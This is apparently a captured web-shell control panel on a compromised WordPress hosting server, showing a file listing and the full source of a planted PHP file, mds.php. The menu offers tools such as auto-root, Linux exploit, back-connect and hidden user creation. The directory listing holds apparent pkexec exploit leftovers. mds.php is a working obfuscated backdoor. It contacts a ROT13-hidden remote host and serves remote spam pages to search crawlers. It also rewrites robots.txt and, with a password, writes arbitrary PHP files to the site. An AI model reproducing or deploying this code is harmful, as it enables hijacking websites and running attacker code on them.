Linux webxc265s02.ad.aruba.it 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 192.168.1.96 | : 34.229.63.28
Cant Read [ /etc/named.conf ]
7.4.33
ID19458730
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
web /
htdocs /
www.dafnemarchesini.it /
home /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
dr-xr-xr-x
20200126_old
[ DIR ]
dr-xr-xr-x
GCONV_PATH=.
[ DIR ]
dr-xr-xr-x
ccx
[ DIR ]
dr-xr-xr-x
cgi-bin
[ DIR ]
dr-xr-xr-x
kjagffassay44712
[ DIR ]
dr-xr-xr-x
saiga
[ DIR ]
dr-xr-xr-x
wp-admin
[ DIR ]
dr-xr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
dr-xr-xr-x
.htaccess
791
B
-r--r--r--
.nfs00000000e7e54f8000988c53
790
B
-r-xr-xr-x
.nfs00000000e7e54f810099e893
790
B
-r-xr-xr-x
.nfs00000000e7e54f820099dc8e
790
B
-r-xr-xr-x
.nfs00000000e7e54f83009ab158
790
B
-r-xr-xr-x
.nfs00000000e7e54f84009a3328
790
B
-r-xr-xr-x
.nfs00000000e7e54f85009af0a1
790
B
-r-xr-xr-x
.nfs00000000e7e54f86009e0d1d
790
B
-r-xr-xr-x
.nfs00000000e7e54f87009e0c17
790
B
-r-xr-xr-x
about.php
14.73
KB
-r-xr-xr-x
adminer.php
465.64
KB
-r-xr-xr-x
classsmtps.php
39
B
-r-xr-xr-x
content.php
5.2
KB
-r-xr-xr-x
index.php
1.73
KB
-r--r--r--
license.txt
20.75
KB
-r-xr-xr-x
licenza.html
24.3
KB
-r-xr-xr-x
mds.php
8.08
KB
-r-xr-xr-x
readme.html
8.52
KB
-r-xr-xr-x
robots.txt
376
B
-r-xr-xr-x
saiga.php
5.76
KB
-r-xr-xr-x
wp-activate.php
7.22
KB
-r-xr-xr-x
wp-blog-header.php
579
B
-r-xr-xr-x
wp-comments-post.php
2.45
KB
-r-xr-xr-x
wp-config-sample.php
3.13
KB
-r-xr-xr-x
wp-config.php
3.17
KB
-r-xr-xr-x
wp-cron.php
5.73
KB
-r-xr-xr-x
wp-links-opml.php
2.67
KB
-r-xr-xr-x
wp-load.php
4
KB
-r-xr-xr-x
wp-login.php
49.43
KB
-r-xr-xr-x
wp-mail.php
8.54
KB
-r-xr-xr-x
wp-settings.php
25.23
KB
-r-xr-xr-x
wp-signup.php
34.12
KB
-r-xr-xr-x
wp-trackback.php
4.98
KB
-r-xr-xr-x
wp.php
389
B
-r-xr-xr-x
xmlrpc.php
3.39
KB
-r-xr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mds.php
<?php @include "wp-content/plugins/js_composer/include/classes/shortcodes/core/include/8898.conf"; @set_time_limit(3600); @ignore_user_abort(1); $xmlname = '%67%75%71%68%6E%79%78%77%2E%74%66%61%76%73%73%65%68%66%2E%67%62%63'; $http_web = 'http'; if (is_https()) { $http = 'https'; } else { $http = 'http'; } $duri_tmp = drequest_uri(); if ($duri_tmp == ''){ $duri_tmp = '/'; } $duri = urlencode($duri_tmp); function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { $duri = $_SERVER['REQUEST_URI']; } else { if (isset($_SERVER['argv'])) { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } else { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $duri; } $goweb = str_rot13(urldecode($xmlname)); function is_https() { if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; } $host = $_SERVER['HTTP_HOST']; $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $lang = urlencode($lang); $urlshang = ''; if (isset($_SERVER['HTTP_REFERER'])) { $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = urlencode($urlshang); } $password = sha1(sha1(@$_GET['pd'])); if ($password == 'f75fd5acd36a7fbd1e219b19881a5348bfc66e79') { $add_content = @$_GET['mapname']; $action = @$_GET['action']; if (isset($_SERVER['DOCUMENT_ROOT'])) { $path = $_SERVER['DOCUMENT_ROOT']; } else { $path = dirname(__FILE__); } if (!$action) { $action = 'put'; } if ($action == 'put') { if (strstr($add_content, '.xml')) { $map_path = $path. '/sitemap.xml'; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . '/robots.txt'; if (file_exists($file_path)) { $data = doutdo($file_path); } else { $data = 'User-agent: * Allow: /'; } $sitmap_url = $http . '://' . $host . '/' . $add_content; if (stristr($data, $sitmap_url)) { echo '<br>sitemap already added!<br>'; } else { if (file_put_contents($file_path, trim($data) . "\r\n" . 'Sitemap: '.$sitmap_url)) { echo '<br>ok<br>'; } else { echo '<br>file write false!<br>'; } } } else { echo '<br>sitemap name false!<br>'; } if (strstr($add_content, '.p' . 'hp')) { $a = sha1(sha1(@$_GET['a'])); $b = sha1(sha1(@$_GET['b'])); if ($a == doutdo($http_web . '://' . $goweb . '/a.p' . 'hp') || $b == 'f8f0dae804368c0334e22d9dcb70d3c7bbfa9635') { $dstr = @$_GET['dstr']; if (file_put_contents($path . '/' . $add_content, $dstr)) { echo 'ok'; } } } } exit; } if (isset($_SERVER['DOCUMENT_ROOT'])) { $path = $_SERVER['DOCUMENT_ROOT']; } else { $path = dirname(__FILE__); } if(is_dir($path. '/wp-includes')){ $fpath = 'wp-includes/css'; }else{ $fpath = 'css'; } $dpath = $path. '/'.$fpath; if(substr($host,0,4)=='www.'){ $host_nw = substr($host, 4); }else{ $host_nw = $host; } $cssn = str_rot13(substr($host_nw,0,3).substr($goweb,0,3)).'.css'; $ps = $path. '/'.$fpath.'/'.$cssn; $urlc = $http_web . '://' . $goweb . '/temp/style.css'; $cssnpth = str_rot13(substr($host_nw,0,3).substr($goweb,0,3)).'pth.css'; $pspth = $path. '/'.$fpath.'/'.$cssnpth; $urlcpth = $http_web . '://' . $goweb . '/temp/stylepth.css'; function ping_sitemap($url){ $url_arr = explode("\r\n", trim($url)); $return_str = ''; foreach($url_arr as $pingUrl){ $pingRes = doutdo($pingUrl); $ok = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'pingok' : 'error'; $return_str .= $pingUrl . '-- ' . $ok . '<br>'; } return $return_str; } function disbot() { $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) { return true; } else { return false; } } function doutdo($url) { $file_contents= ''; if(function_exists('curl_init')){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } function fcss($dpath,$ps,$urlc){ if(is_dir($dpath)){ if(!file_exists($ps)){ @file_put_contents($ps,doutdo($urlc)); } }else{ if(@mkdir($dpath)){ if(!file_exists($ps)){ @file_put_contents($ps,doutdo($urlc)); } } } } if($duri_tmp=='/' || strstr($duri_tmp, 'ewttm')){ fcss($dpath,$ps,$urlc); fcss($dpath,$pspth,$urlcpth); } if(is_file($ps)){ $web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang. '&css=1'; }else{ $web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang; } $html_content = trim(doutdo($web)); if (!strstr($html_content, 'nobotuseragent')) { if (strstr($html_content, 'okhtmlgetcontent')) { @header("Content-type: text/html; charset=utf-8"); if (strstr($html_content, '[##linkcss##]')) { if(file_exists($ps)){ $lcss_str = file_get_contents($ps); $html_content = str_replace("[##linkcss##]", '<style>'.$lcss_str.'</style>', $html_content); }else{ $html_content = str_replace("[##linkcss##]", '', $html_content); } } if (strstr($html_content, '[##pthlinkcss##]')) { if(file_exists($pspth)){ $lcsspth_str = file_get_contents($pspth); $html_content = str_replace("[##pthlinkcss##]", $lcsspth_str, $html_content); }else{ $html_content = str_replace("[##pthlinkcss##]", '', $html_content); } } $html_content = str_replace("okhtmlgetcontent", '', $html_content); echo $html_content; exit(); }else if(strstr($html_content, 'okxmlgetcontent')){ $html_content = str_replace("okxmlgetcontent", '', $html_content); @header("Content-type: text/xml"); echo $html_content; exit(); }else if(strstr($html_content, 'pingxmlgetcontent')){ $html_content = str_replace("pingxmlgetcontent", '', $html_content); fcss($dpath,$ps,$urlc); fcss($dpath,$pspth,$urlcpth); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($html_content); exit(); }else if (strstr($html_content, 'getcontent500page')) { @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if (strstr($html_content, 'getcontent404page')) { @header('HTTP/1.1 404 Not Found'); exit(); }else if (strstr($html_content, 'getcontent301page')) { @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page", '', $html_content); header('Location: ' . $html_content); exit(); } }/* blog M148 */ ?> @include "wp-content/plugins/js_composer/include/classes/shortcodes/core/include/8898.conf";
Close